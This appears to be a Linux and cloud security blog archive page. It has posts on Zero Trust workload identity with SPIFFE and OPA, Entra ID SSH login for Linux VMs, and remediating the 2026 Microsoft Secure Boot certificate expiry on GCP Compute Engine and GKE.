Service meshes (Istio, Linkerd, Consul Connect) implement mTLS transparently — the application doesn’t handle certificates; the sidecar proxy does. In Istio’s case, Citadel (now istiod) acts as the SPIFFE-compatible CA, issuing certificates to envoy sidecars. The application code doesn’t change.


Open Policy Agent: Authorization After Identity

Zero Trust separates identity from authorization. Once you know who the caller is (SPIFFE ID, OIDC token, user cert), a policy engine decides what they can do.

OPA (Open Policy Agent) is the standard for this:

# opa-policy.rego
package authz

# payments-svc can read orders; nothing else can write orders
allow {
  input.caller == "spiffe://corp.com/ns/prod/sa/payments-svc"
  input.method == "GET"
  startswith(input.path, "/api/orders")
}

default allow = false

The service checks OPA on each request: “caller=X wants to do Y to Z — allowed?” OPA evaluates the policy and returns a decision. The policy is version-controlled, tested, and deployed independently of the service.


⚠ Common Misconceptions

“Zero Trust means no trust.” Zero Trust means trust is earned dynamically through verification, not granted by network location. A verified user with a valid, compliant device and MFA is trusted — for the scope and duration of the verified session. The “zero” refers to implicit trust, not trust itself.

“SPIFFE replaces OIDC.” SPIFFE is for workload (service) identity. OIDC is for human (user) identity. They complement each other — a service has a SPIFFE identity; a user has an OIDC identity; the authorization layer accepts both.

“mTLS is complex to implement.” With a service mesh (Istio, Linkerd), mTLS is transparent — the sidecar handles it. Without a service mesh, the application needs to use the SPIFFE Workload API. The complexity is real but manageable, especially compared to the alternative of static API keys.


Framework Alignment

Domain Relevance
CISSP Domain 5: Identity and Access Management Zero Trust extends IAM to workloads (SPIFFE) and continuous verification (short-lived tokens, device posture) — it’s the current frontier of identity architecture
CISSP Domain 3: Security Architecture and Engineering The separation of identity (SPIFFE ID), authentication (mTLS), and authorization (OPA) is a clean architectural decomposition that scales to complex multi-service environments
CISSP Domain 4: Communications and Network Security mTLS encrypts and authenticates every service-to-service connection — it eliminates the assumption that east-west traffic on the internal network is safe
CISSP Domain 1: Security and Risk Management Zero Trust is a risk management posture — it accepts that perimeter breach is inevitable and limits blast radius through continuous verification and least-privilege

Key Takeaways

  • Zero Trust rejects network-based implicit trust — every request is verified regardless of source
  • Human identity: short-lived OIDC tokens, device posture checks, Conditional Access, JIT privileged access (Vault, CyberArk)
  • Workload identity: SPIFFE IDs in X.509 certificates, issued by SPIRE, rotated automatically every hour — no static API keys
  • mTLS lets services verify each other’s identity at the TLS layer — service meshes (Istio, Linkerd) implement it transparently
  • OPA handles authorization after identity is established — who you are ≠ what you can do
  • The series arc: /etc/passwd → NIS → LDAP → Kerberos → SAML → OIDC → SPIFFE/SPIRE — the problem has always been “how do you know who someone is, at scale, without trusting the network?” The answer keeps getting better.

What does identity look like at your organization — still static API keys and shared service accounts, or moving toward SPIFFE and short-lived credentials? 👇


The Identity Stack: From LDAP to Zero Trust — 13 episodes complete.

Start from EP01: What Is LDAP →

Entra ID Linux Login: SSH Authentication with Azure AD Credentials

Reading Time: 6 minutes

The Identity Stack, Episode 12
EP11: Identity ProvidersEP12EP13: Zero Trust Identity → …


TL;DR

  • Entra ID (Azure AD) Linux login lets you SSH into a VM using your Azure AD credentials — no local Linux accounts, no SSH keys to distribute
  • The stack: aad-auth package + pam_aad.so + SSSD — Azure authenticates via OIDC device code flow or password, then maps the identity to a local Linux UID
  • Entra ID is not AD — it’s OIDC/OAuth2 native, with no LDAP and no Kerberos (unless you add Azure AD DS, a separate managed service)
  • Conditional Access Policies can gate Linux logins — MFA, device compliance, location restrictions — the same policies as for web apps
  • Two login modes: interactive (browser-based device code, for non-Azure VMs) and integrated (Azure IMDS-based, for Azure VMs)
  • Required roles: Virtual Machine Administrator Login or Virtual Machine User Login on the VM — IAM, not local sudoers

The Big Picture: How Entra ID Linux Login Works

User: ssh [email protected]

  sshd on Linux VM
      │
      ▼
  PAM (/etc/pam.d/sshd)
      │
      ├── pam_aad.so (auth)
      │     │
      │     │  OIDC device code flow:
      │     │  "Go to microsoft.com/devicelogin and enter code ABCD-1234"
      │     │  User authenticates in browser with MFA
      │     │  Entra ID issues id_token + access_token
      │     ▼
      │   pam_aad validates token:
      │     • signature (JWKS from Entra ID)
      │     • tenant ID (iss claim)
      │     • VM resource audience (aud claim)
      │     • group membership (groups claim)
      │
      └── pam_mkhomedir (session)
            Creates /home/[email protected] on first login

  Shell session created
  whoami → vamshi_corp_com (sanitized UPN for Linux username)

EP11 mapped the IdP landscape. This episode gets specific: Entra ID and Linux. Understanding this matters because Entra ID is increasingly where enterprise identities live, and cloud VMs that SSH into with local accounts are an operational and security liability.


Entra ID vs Active Directory: What’s Different

This distinction matters before configuring anything.

Active Directory (on-prem) Entra ID (cloud)
Protocol LDAP + Kerberos OIDC + OAuth2
Directory queries ldapsearch Microsoft Graph API
Linux join realm join (adcli + SSSD) aad-auth package
Authentication Kerberos tickets JWT tokens
Group policy GPO via Sysvol Conditional Access + Intune
Network requirement DC reachable on LAN/VPN HTTPS to login.microsoftonline.com

Entra ID has no LDAP interface and no Kerberos realm. You cannot run ldapsearch against it. You cannot kinit to it. The authentication protocol is entirely OIDC/OAuth2 — the same protocol your browser uses to “Login with Microsoft.”

If you need LDAP and Kerberos from Azure, that’s Azure AD Domain Services — a separate managed service that Microsoft runs, which does speak LDAP and Kerberos. It’s not Entra ID; it’s a managed AD replica in Azure. EP12 covers the Entra ID path — the modern, protocol-native approach.


Prerequisites

# Azure side:
# 1. The VM's managed identity must be enabled (System-assigned)
# 2. Two Entra ID roles assigned on the VM resource:
#    - "Virtual Machine Administrator Login" (for sudo access)
#    - "Virtual Machine User Login" (for regular access)
# 3. Conditional Access policies that apply to the VM login scope

# VM side (Ubuntu 20.04+ / RHEL 8+):
# Install the aad-auth package (Microsoft-maintained)
curl -sSL https://packages.microsoft.com/keys/microsoft.asc \
  | gpg --dearmor -o /usr/share/keyrings/microsoft.gpg
echo "deb [signed-by=/usr/share/keyrings/microsoft.gpg] \
  https://packages.microsoft.com/ubuntu/22.04/prod jammy main" \
  > /etc/apt/sources.list.d/microsoft.list
apt-get update && apt-get install -y aad-auth

Configuration

# Configure the aad-auth package
aad-auth configure \
  --tenant-id 12345678-1234-1234-1234-123456789abc \
  --app-id 87654321-4321-4321-4321-cba987654321

# This writes /etc/aad.conf:
# [aad]
# tenant_id = 12345678-...
# app_id = 87654321-...
# version = 1

# Verify the PAM configuration was updated
grep pam_aad /etc/pam.d/common-auth
# auth [success=1 default=ignore] pam_aad.so

The aad-auth package installs pam_aad.so and configures PAM automatically. It also modifies /etc/nsswitch.conf to add aad as a source for passwd lookups — so getent passwd [email protected] works after the first login.


The Login Flow

On an Azure VM (Integrated mode)

Azure VMs have access to the Instance Metadata Service (IMDS) at 169.254.169.254. pam_aad uses the VM’s managed identity to get a token from IMDS, which proves the VM is trusted, then validates the user’s token against the tenant.

# User SSHes with username as UPN ([email protected] or [email protected])
ssh [email protected]@vm.eastus.cloudapp.azure.com

# Or use the short form if the tenant is configured:
ssh [email protected]@vm.eastus.cloudapp.azure.com

On first connection, pam_aad initiates the device code flow:

To sign in, use a web browser to open https://microsoft.com/devicelogin
and enter the code ABCD-1234 to authenticate.

The user opens the URL in any browser (on any device), enters the code, and authenticates with their Entra ID credentials + MFA. The SSH session gets a token. Subsequent logins within the token cache TTL skip the device code step.

Username format on the Linux system

Entra ID usernames (UPNs) contain @ — not valid in Linux usernames. aad-auth sanitizes the UPN:

[email protected] → vamshi_corp_com    (default)
# or, with shorter_username enabled in /etc/aad.conf:
[email protected] → vamshi

The UID is derived from the Azure AD Object ID (a deterministic hash) — stable across logins, same UID on every VM in the tenant.


Conditional Access for Linux Logins

Conditional Access Policies in Entra ID apply to Linux VM logins the same way they apply to web app logins.

Policy: Require MFA for Linux VM Login
  Conditions:
    Cloud apps: "Azure Linux Virtual Machine Sign-In"
    Users: All users (or specific groups)
  Grant:
    Require multi-factor authentication
    Require compliant device (optional)

With this policy, every SSH login triggers MFA — regardless of whether the client machine supports it. The MFA challenge appears in the device code flow (the browser window the user opens).

You can also enforce:
Location restrictions — only from corporate IP ranges
Device compliance — device must be Intune-managed
Sign-in risk — block logins flagged as risky by Entra ID Identity Protection

This is the operational shift: Linux login security is now managed in the same Conditional Access policy engine as every other Entra ID-protected resource. No more per-machine PAM configuration for MFA.


Role-Based Access: Who Can Log In

Access to the VM is controlled by Azure RBAC — not by local Linux groups or sudoers.

# Grant a user SSH access to the VM
az role assignment create \
  --assignee [email protected] \
  --role "Virtual Machine User Login" \
  --scope /subscriptions/SUB_ID/resourceGroups/RG/providers/Microsoft.Compute/virtualMachines/VM_NAME

# Grant admin (sudo) access
az role assignment create \
  --assignee [email protected] \
  --role "Virtual Machine Administrator Login" \
  --scope /subscriptions/SUB_ID/...

Virtual Machine Administrator Login maps to the sudo group on the Linux VM. Users with this role get passwordless sudo. Users with Virtual Machine User Login get a regular shell.

The mapping is enforced by pam_aad checking the groups claim in the token against the configured admin group. No /etc/sudoers.d/ files needed.


Debugging Entra ID Linux Logins

# Check aad-auth service status
systemctl status aad-auth

# View aad-auth logs
journalctl -u aad-auth -f

# Attempt a manual token validation (requires aad-auth debug mode)
aad-auth login --username [email protected]

# Check the local user cache
getent passwd vamshi_corp_com
# Returns if the user has logged in before

# Clear the local cache (forces re-authentication)
aad-auth clean-cache

# Verify Conditional Access isn't blocking (check Entra ID Sign-in logs)
# Azure Portal → Entra ID → Sign-in logs → filter by user + app "Azure Linux VM Sign-In"

The Entra ID Sign-in logs in the Azure Portal show every authentication attempt, the Conditional Access policies that evaluated, which ones passed/failed, and the exact failure reason. This is far more diagnostic than reading PAM logs.


Entra ID Connect: Bringing On-Prem Users to Entra ID

For organizations with existing on-prem AD who want to enable Entra ID Linux login:

On-prem AD users → Entra ID Connect sync → Entra ID
                                                │
                                    Linux VM login (aad-auth)

Entra ID Connect is a Windows Server application that syncs users from on-prem AD to Entra ID every 30 minutes. Users authenticate against Entra ID (which validates against AD via Password Hash Sync, Pass-Through Authentication, or Federation). The Linux VM doesn’t know or care — it sees an Entra ID token.

With Password Hash Sync: password hashes (not plaintext) are synced to Entra ID — users authenticate directly in the cloud.
With Pass-Through Authentication: Entra ID forwards authentication requests to an on-prem agent that validates against AD — no password hashes leave the datacenter.
With Federation (AD FS / Entra ID as a relying party): Entra ID delegates authentication to AD FS — the most complex, the most on-prem control.


⚠ Common Misconceptions

“Entra ID = Azure Active Directory = Active Directory.” Three different things. Active Directory: on-prem, LDAP+Kerberos. Azure AD (now Entra ID): cloud, OIDC+OAuth2. Azure AD Domain Services: managed AD replica in Azure, LDAP+Kerberos, not Entra ID.

“You need Azure AD DS to join Linux to Azure.” Azure AD DS is the managed AD service. Entra ID Linux login (via aad-auth) is entirely separate and doesn’t require AD DS. You can authenticate Linux to Entra ID directly via OIDC.

“The Linux username matches the Entra ID username.” The UPN is sanitized (@_) to produce a valid Linux username. The canonical identity is the UPN or the Entra Object ID. Don’t hardcode the sanitized username in scripts.


Framework Alignment

Domain Relevance
CISSP Domain 5: Identity and Access Management Entra ID Linux login centralizes Linux VM access in the same IAM system as all other enterprise resources — one policy engine, one audit log
CISSP Domain 3: Security Architecture and Engineering Eliminating per-VM local accounts removes a class of credential management risk — no SSH keys to rotate, no local accounts to audit
CISSP Domain 1: Security and Risk Management Conditional Access Policies enforcing MFA on Linux logins reduce the risk of credential-based compromise of cloud VMs

Key Takeaways

  • Entra ID Linux login uses OIDC device code flow — no LDAP, no Kerberos, no local Linux accounts
  • aad-auth package installs pam_aad.so and handles the full authentication stack: token issuance, validation, user cache, UID mapping
  • VM access is controlled by Azure RBAC roles (Virtual Machine Administrator Login / Virtual Machine User Login) — not by sudoers files
  • Conditional Access Policies apply to Linux VM logins — MFA, device compliance, and location restrictions use the same engine as every other Entra ID app
  • Debugging starts in Entra ID Sign-in logs (Azure Portal), not in /var/log/auth.log

What’s Next

EP12 showed how Entra ID enables Linux logins in the cloud. EP13 is the series closer: Zero Trust identity — what it means to verify identity continuously, how SPIFFE and SPIRE handle workload (non-human) identity, and where the stack goes from /etc/passwd in 1970 to a Zero Trust policy engine in 2026.

Next: Zero Trust Identity: SPIFFE, SPIRE, mTLS, and Continuous Verification

Get EP13 in your inbox when it publishes → linuxcent.com/subscribe

GCP Secure Boot Certificate Expiration 2026: What You Must Do Before June 24

Reading Time: 10 minutes


TL;DR

  • Three Microsoft UEFI Secure Boot certificates expire between June 24 and October 19, 2026
  • Any GCP Compute Engine instance with Secure Boot enabled, created before November 7, 2025, carries the old certs and is at risk
  • When the certs expire, instances may fail to boot after OS updates that pull in bootloaders signed only by the replacement 2023 certificates
  • GKE Shielded Nodes are affected too — node pools whose nodes haven’t been recreated since November 7, 2025 carry the old UEFI database
  • vTPM-sealed secrets, BitLocker, and Linux full disk encryption break if Secure Boot fails mid-update
  • Primary fix: recreate affected instances (post-Nov 7, 2025 instances include the updated UEFI DB automatically)
  • Emergency workaround if boot fails: temporarily disable Secure Boot, apply updates, re-enable

The Big Picture: The UEFI Secure Boot Trust Chain

  UEFI Firmware (PK — Platform Key, set by OEM/Google)
         │
         │  PK signs KEK updates
         ▼
  ┌─────────────────────────────────────────────┐
  │        KEK (Key Exchange Key Database)       │
  │  Microsoft Corporation KEK CA 2011           │ ← EXPIRING Jun 24, 2026
  │  Microsoft Corporation KEK CA 2023           │ ← Replacement (new VMs only)
  └────────────────────┬────────────────────────┘
                       │  KEK authorizes DB/DBX updates
                       ▼
  ┌─────────────────────────────────────────────┐
  │         DB (Authorized Signature Database)   │
  │  Microsoft UEFI CA 2011 ← signs Linux Shim  │ ← EXPIRING Jun 27, 2026
  │  Microsoft Windows PCA 2011 ← signs WinBoot │ ← EXPIRING Oct 19, 2026
  │  Microsoft UEFI CA 2023 ← replacement       │ ← Present on post-Nov 7 VMs
  │  Microsoft Windows PCA 2023 ← replacement   │ ← Present on post-Nov 7 VMs
  └────────┬───────────────────────┬────────────┘
           │                       │
           ▼                       ▼
   Linux Shim (shim.efi)    Windows Boot Manager
           │
           ▼
       GRUB2 / systemd-boot
           │
           ▼
       Linux Kernel

GCP Compute Engine instances with Secure Boot enabled — created before November 7, 2025 — have a UEFI signature database that includes the 2011 certificates but not the 2023 replacements. When those 2011 certificates expire, new bootloader binaries (signed exclusively by the 2023 certs) will be rejected at boot time.


What Secure Boot Actually Does — and Why Certificate Expiry Breaks Booting

Secure Boot is UEFI’s mechanism for ensuring that only cryptographically signed, trusted software runs during the boot sequence. The trust chain works like this:

  1. Platform Key (PK): Root of trust, set by the hardware manufacturer or cloud provider. Authorizes updates to the KEK.
  2. Key Exchange Key (KEK): Authorizes modifications to the DB and DBX (the forbidden signatures database). Microsoft holds one KEK slot; OEMs often hold another.
  3. DB (Signature Database): Contains the public certificates used to verify bootloaders. If a bootloader binary is signed by a cert in DB, it’s allowed to run. If not, the firmware halts.
  4. DBX (Forbidden Signatures Database): Revocation list. Bootloaders explicitly listed here are blocked even if they were once trusted.

Where expiry matters: The DB certificates don’t “enforce” anything at runtime by checking dates themselves — UEFI doesn’t do certificate revocation in real time. The problem is different and more insidious: as Linux distributions and Microsoft ship updated bootloaders, those new binaries are signed only by the 2023 replacement certificates, not the expiring 2011 ones. If your VM’s DB doesn’t contain the 2023 certs, the UEFI firmware will reject the new shim, and the system won’t boot after an OS update that upgrades the bootloader package.

On Debian/Ubuntu, shim-signed upgrades. On RHEL/CentOS Stream, shim-x64 upgrades. Either way: new binary, new signature, old DB — boot failure.


The Three Certificates Expiring in 2026

1. Microsoft Corporation KEK CA 2011 — expires June 24, 2026

Role: Authorizes updates to the DB and DBX signature databases.

When the KEK expires, firmware that enforces KEK validity may refuse to accept DB/DBX updates signed by this certificate. This means even if Google pushes an out-of-band UEFI DB update containing the 2023 certs, instances with an expired-only KEK slot may not be able to apply it cleanly.

Replacement: Microsoft Corporation KEK CA 2023


2. Microsoft Corporation UEFI CA 2011 — expires June 27, 2026

Role: Signs third-party bootloaders — specifically the Linux Shim (shim.efi).

This is the most critical cert for Linux workloads. Every major Linux distribution uses a shim bootloader as the first-stage loader in a Secure Boot chain. The shim is signed by Microsoft’s UEFI CA because Linux vendors submit their shim builds to Microsoft for signing (to ensure broad UEFI compatibility). When new shim packages are released signed only by UEFI CA 2023, any VM with only the 2011 cert in its DB will reject them.

Replacement: Microsoft UEFI CA 2023


3. Microsoft Windows Production PCA 2011 — expires October 19, 2026

Role: Signs Windows Boot Manager and other Windows boot components.

Windows instances on GCP using Secure Boot are affected by this cert. Post-expiry Windows OS updates that ship a new Boot Manager binary signed exclusively by the 2023 PCA will fail to boot on instances carrying only the 2011 cert.

Replacement: Microsoft Windows Production PCA 2023

Windows-specific signal: Event ID 1801 in the Windows System event log — “Secure Boot CA/keys need to be updated” — will appear by mid-2026 on affected instances, before actual boot failure. This is your warning window.


Why GCP Instances Are Specifically Affected

Google’s Compute Engine Shielded VMs ship with a pre-populated UEFI variable database. The content of that database is fixed at instance creation time — it’s part of the VM’s UEFI firmware image. Instances created before November 7, 2025 have a DB that contains the 2011 certs but not the 2023 replacements. Instances created on or after November 7, 2025 had the updated database backfilled.

This is not a Google-specific failure. Every cloud provider and on-premises hypervisor platform that uses Secure Boot with a pre-populated UEFI DB has the same problem. GCP is ahead of many platforms in actually documenting it.


GKE Shielded Nodes: The Operational Blind Spot

GKE’s Shielded Nodes feature enables Secure Boot on node pool VMs. Each node is a Compute Engine instance — and all the same rules apply.

The risk: Node pools whose nodes were last provisioned before November 7, 2025 carry the old UEFI database. When containerd, the OS image, or the kernel gets updated via node auto-upgrade or manual node pool upgrade, the new node VMs will carry updated certs. But nodes that haven’t been replaced since before the cutoff are sitting on the old DB.

GKE auto-upgrade helps — but only if it’s actually running and has completed at least one full node replacement cycle since November 7, 2025.

Node pools with auto-upgrade disabled, or clusters in maintenance windows that delayed upgrades, are at risk.

The trigger scenario:
1. GKE runs a node OS update in-place on an old node (not a full node replacement)
2. The update upgrades the shim package to a version signed only by UEFI CA 2023
3. Next reboot: the node fails to boot
4. The node is marked NotReady, workloads are rescheduled — but the underlying VM is stuck


Detecting Affected Resources

Compute Engine Instances

gcloud compute instances list \
  --filter="creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true" \
  --format="table(name,zone,creationTimestamp,shieldedInstanceConfig.enableSecureBoot,status)"

Sample output:

NAME               ZONE           CREATION_TIMESTAMP        ENABLE_SECURE_BOOT  STATUS
prod-api-01        us-central1-a  2024-08-15T10:22:00Z      True                RUNNING   ← at risk
prod-db-02         us-central1-b  2023-11-01T08:15:00Z      True                RUNNING   ← at risk
prod-web-03        us-central1-a  2025-12-01T14:30:00Z      True                RUNNING   ← safe (post-Nov 7)

GKE Node Pools

# List node pools with Secure Boot enabled per cluster
gcloud container clusters list --format="value(name,location)" | while read NAME LOCATION; do
  echo "=== Cluster: $NAME ($LOCATION) ==="
  gcloud container node-pools list \
    --cluster="$NAME" \
    --location="$LOCATION" \
    --filter="config.shieldedInstanceConfig.enableSecureBoot=true" \
    --format="table(name,config.shieldedInstanceConfig.enableSecureBoot,management.autoUpgrade)"
done

Then verify node creation timestamps within affected pools:

gcloud compute instances list \
  --filter="labels.goog-gke-node:* AND creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true" \
  --format="table(name,zone,creationTimestamp,labels.goog-gke-node)"

Checking the UEFI DB on a Running Instance

SSH into an affected instance and verify which certs are in the DB:

# On the instance (requires mokutil and/or efitools)
sudo mokutil --db | grep -A3 "Subject:"

Look for CN=Microsoft UEFI CA 2023 in the output. Its absence means your instance has only the 2011 certs.

On GKE nodes (where you have node shell access via a DaemonSet or node debug pod):

# Using kubectl debug for node access
kubectl debug node/NODE_NAME -it --image=ubuntu -- bash
# Then inside the debug pod:
chroot /host
mokutil --db 2>/dev/null | grep "Microsoft.*2023" || echo "2023 cert NOT present — node at risk"

Solutions

Instances created after November 7, 2025 automatically receive the updated UEFI certificate database. The simplest fix is to recreate affected instances.

For Compute Engine:

# Step 1: Create a machine image (snapshot) of the existing instance
gcloud compute machine-images create INSTANCE_NAME-backup \
  --source-instance=INSTANCE_NAME \
  --source-instance-zone=ZONE

# Step 2: Delete the old instance (after verifying backup)
gcloud compute instances delete INSTANCE_NAME --zone=ZONE

# Step 3: Create new instance from machine image
gcloud compute instances create INSTANCE_NAME \
  --source-machine-image=INSTANCE_NAME-backup \
  --zone=ZONE \
  --shielded-secure-boot \
  --shielded-vtpm \
  --shielded-integrity-monitoring

The new instance will have the post-November 7, 2025 UEFI DB.

For GKE Node Pools:

# Option A: Upgrade the node pool (triggers node recreation)
gcloud container clusters upgrade CLUSTER_NAME \
  --location=LOCATION \
  --node-pool=NODE_POOL_NAME

# Option B: Recreate the node pool entirely
gcloud container node-pools create NODE_POOL_NAME-new \
  --cluster=CLUSTER_NAME \
  --location=LOCATION \
  --shielded-secure-boot \
  --shielded-integrity-monitoring \
  [... your existing pool config ...]

# Then cordon and drain the old pool nodes
kubectl cordon NODE_NAME
kubectl drain NODE_NAME --ignore-daemonsets --delete-emptydir-data

# Finally delete the old node pool
gcloud container node-pools delete NODE_POOL_NAME \
  --cluster=CLUSTER_NAME \
  --location=LOCATION

Option 2: Disable Secure Boot Temporarily (Emergency Workaround)

If an instance has already failed to boot after an OS update, or if you need to apply bootloader updates before recreating the instance:

# Disable Secure Boot on the stopped instance
gcloud compute instances update INSTANCE_NAME \
  --zone=ZONE \
  --no-shielded-secure-boot

# Start the instance
gcloud compute instances start INSTANCE_NAME --zone=ZONE

# SSH in, apply OS updates and any pending bootloader upgrades
# (The system will boot without Secure Boot enforcement)
sudo apt-get update && sudo apt-get upgrade -y   # Debian/Ubuntu
# or
sudo dnf update -y                                # RHEL/CentOS

# Stop the instance again
gcloud compute instances stop INSTANCE_NAME --zone=ZONE

# Re-enable Secure Boot
gcloud compute instances update INSTANCE_NAME \
  --zone=ZONE \
  --shielded-secure-boot

# Start again — now boots with new bootloader binaries
gcloud compute instances start INSTANCE_NAME --zone=ZONE

Note: This workaround doesn’t add the 2023 certs to the DB. It bypasses Secure Boot enforcement temporarily. The underlying UEFI DB still only has the 2011 certs. You still need to recreate the instance to get the updated DB — this is only a bridge to keep the instance alive while you plan migration.


Option 3: Restore from Machine Image

If an instance is already in a boot failure state and the workaround above doesn’t apply:

# List available machine images
gcloud compute machine-images list

# Restore from a pre-failure machine image
gcloud compute instances create INSTANCE_NAME-restored \
  --source-machine-image=MACHINE_IMAGE_NAME \
  --zone=ZONE

Then immediately plan recreation on a post-November 7, 2025 instance.


vTPM, BitLocker, and Full Disk Encryption: The Hidden Risk

For VMs using Shielded VM features beyond just Secure Boot — specifically vTPM with sealed secrets — certificate expiry creates a more dangerous failure mode.

How vTPM sealing works:

  Boot sequence measurements → PCR registers (PCR 0–7 for UEFI, PCR 8–15 for OS)
         │
         ▼
  TPM seals secrets (FDE key, BitLocker key) to specific PCR values
         │
         ▼
  On next boot: PCR values must match for TPM to release the key
         │
         ▼
  If Secure Boot state changes (cert DB changes, Secure Boot disabled) →
  PCR values change → TPM refuses to unseal → FDE fails → disk inaccessible

What this means in practice:

  • Linux FDE (LUKS with TPM2 unsealing): If Secure Boot fails or is temporarily disabled per the workaround above, the TPM will not release the LUKS volume key. The system will drop to a recovery prompt. You need the LUKS recovery passphrase.

  • Windows BitLocker: If PCR values shift (Secure Boot disabled, cert DB changed), BitLocker enters recovery mode. The VM prompts for the BitLocker recovery key on next boot. Without it, the volume is inaccessible.

  • Windows Virtual Secure Mode: VSM uses vTPM to protect credentials. If Secure Boot state changes, VSM-protected secrets become inaccessible until re-enrollment.

Action before any changes:

# For Linux: ensure you have the LUKS recovery key
sudo cryptsetup luksDump /dev/sda3 | grep "Key Slot"

# For Windows: export BitLocker recovery key before touching Secure Boot state
# (Do this from within the running Windows instance via PowerShell)
Get-BitLockerVolume | Select-Object -ExpandProperty KeyProtector | Where-Object {$_.KeyProtectorType -eq "RecoveryPassword"}

Store recovery keys in Secret Manager, not just locally:

# Store LUKS key in GCP Secret Manager
echo -n "YOUR_RECOVERY_KEY" | gcloud secrets create luks-recovery-INSTANCE_NAME \
  --data-file=- \
  --replication-policy=automatic

⚠ Production Gotchas

1. OS update automation is the trigger, not the cert expiry date itself.
The certs don’t enforce anything at runtime. The actual failure happens when an unattended-upgrade, yum-cron, or GKE node OS update pulls in a new shim/Boot Manager binary signed only by the 2023 cert. Instances may fail to boot weeks or months before the official cert expiry date if distros ship updated bootloaders early.

2. GKE surge upgrades can mask the problem — temporarily.
During a node pool upgrade, GKE creates new nodes (with updated certs) before draining old ones. Workloads move to new nodes. The old nodes get deleted. This looks fine — until you realize some in-place operations (node taints, label changes, manual kubelet restarts) could force old nodes to reboot without triggering node replacement.

3. Disabling Secure Boot changes vTPM PCR values — plan FDE recovery before touching anything.
The temporary workaround (disable Secure Boot) will invalidate TPM-bound disk encryption. Have recovery keys ready before running --no-shielded-secure-boot.

4. Windows Event ID 1801 is an early warning — act on it.
If you see this event in your Windows Compute Engine instances before June 2026, that instance has already identified itself as carrying the old certs. Use it as your automated detection signal in Cloud Logging.

# Query Cloud Logging for Event ID 1801 across Windows instances
gcloud logging read 'resource.type="gce_instance" AND jsonPayload.EventID=1801' \
  --format="table(resource.labels.instance_id,timestamp,jsonPayload.Message)" \
  --limit=50

5. Instance templates propagate the old DB.
If you use instance templates or managed instance groups (MIGs) to create VMs, and those templates were created before November 7, 2025, new instances created from them may or may not inherit updated certs depending on how the template configures the UEFI DB. Verify by checking creation timestamp of the resulting instance, not the template.

6. Custom OS images don’t fix this.
Importing a custom image or using a custom OS does not update the UEFI certificate database. The DB is part of the VM’s UEFI firmware state, not the OS disk image. Recreating the instance is the only reliable path.


Quick Reference: Commands

Task Command
List affected Compute Engine VMs gcloud compute instances list --filter="creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true"
Check UEFI DB on a Linux VM sudo mokutil --db \| grep -E "Subject\|Not After"
Check for 2023 cert presence mokutil --db 2>/dev/null \| grep "Microsoft.*2023" \|\| echo "2023 cert absent"
Disable Secure Boot (emergency) gcloud compute instances update INSTANCE --zone=ZONE --no-shielded-secure-boot
Re-enable Secure Boot gcloud compute instances update INSTANCE --zone=ZONE --shielded-secure-boot
Find affected GKE nodes gcloud compute instances list --filter="labels.goog-gke-node:* AND creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true"
Trigger GKE node pool upgrade gcloud container clusters upgrade CLUSTER --location=LOCATION --node-pool=POOL
Store LUKS key in Secret Manager echo -n "KEY" \| gcloud secrets create NAME --data-file=-
Query Windows Event 1801 in Logging gcloud logging read 'resource.type="gce_instance" AND jsonPayload.EventID=1801'
Create machine image backup gcloud compute machine-images create BACKUP --source-instance=INSTANCE --source-instance-zone=ZONE

Framework Alignment

Framework Domain Relevance
CISSP Domain 7: Security Operations Patch management, boot integrity, incident response
CISSP Domain 3: Security Architecture Secure Boot trust chain, TPM integration, cryptographic key lifecycle
NIST CSF 2.0 ID.AM, PR.IP Asset inventory of affected VMs; integrity protection of boot chain
CIS Benchmarks CIS Google Cloud Computing Foundations Shielded VM controls, vTPM configuration
OWASP Top 10 A05: Security Misconfiguration Failure to maintain certificate currency in security-critical infrastructure

Key Takeaways

  • The expiry of three Microsoft UEFI CA certificates in 2026 creates a window where GCP VMs with Secure Boot enabled — created before November 7, 2025 — will fail to boot after pulling in new bootloader packages
  • The failure is not instantaneous on the cert expiry date. It’s triggered by the next OS update that ships a bootloader signed exclusively by the 2023 replacement certs
  • GKE Shielded Nodes are affected through the same mechanism: node VMs that haven’t been recreated since November 7, 2025 carry the old UEFI database
  • vTPM-sealed secrets (FDE, BitLocker, VSM) add a secondary failure mode if Secure Boot state is changed as part of remediation — have recovery keys before touching anything
  • Google’s recommended fix is instance recreation. The workaround (disable Secure Boot temporarily) keeps instances alive but doesn’t fix the underlying DB — treat it as a bridge, not a resolution
  • Audit now, before June 24. The command is one line. The blast radius of missing this is a production boot failure at 2 AM after a routine security patch run

What’s Next

If you’re running Shielded VMs in production, this certificate expiry is the kind of quiet deadline that fails silently — not with an alarm, but with a VM that doesn’t come back after a patch cycle. The time to audit is before your automated patching runs, not after.

If you found this useful, the linuxcent.com newsletter covers infrastructure security at this depth regularly — kernel internals, cloud platform gotchas, and the operational implications that vendor docs bury in footnotes.

Get the next deep-dive in your inbox when it publishes → [subscribe link]

Zero Trust Access in the Cloud: How the Evaluation Loop Actually Works

Reading Time: 10 minutes


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege EscalationAWS Least Privilege AuditSAML vs OIDC FederationKubernetes RBAC and AWS IAMZero Trust Access in the Cloud


TL;DR

  • Zero Trust: trust nothing implicitly, verify everything explicitly, minimize blast radius by assuming you will be breached
  • Network location is not identity — VPN is authentication for the tunnel, not authorization for the resource
  • JIT privilege elevation removes standing admin access: engineers request elevation for a specific purpose, scoped to a specific duration
  • Device posture is an access signal — a compromised endpoint with valid credentials is still a threat; Conditional Access gates on device compliance
  • Continuous session validation re-evaluates signals throughout the session — device falls out of compliance, sessions revoke in minutes, not at expiry
  • The highest-ROI early moves: eliminate machine static credentials, enforce MFA on all human access, federate to a single IdP

The Big Picture

  ZERO TRUST IAM — EVERY REQUEST EVALUATED INDEPENDENTLY

  API call arrives
         │
         ▼
  Identity verified? ──── No ────► DENY
         │
        Yes
         │
         ▼
  Device compliant? ───── No ────► DENY (or step-up MFA)
         │
        Yes
         │
         ▼
  Policy allows this  ─── No ────► DENY
  action on this ARN?
         │
        Yes
         │
         ▼
  Conditions met? ─────── No ────► DENY
  (time, IP, MFA age,              (e.g., outside business hours,
   risk score, session)             impossible travel detected)
         │
        Yes
         │
         ▼
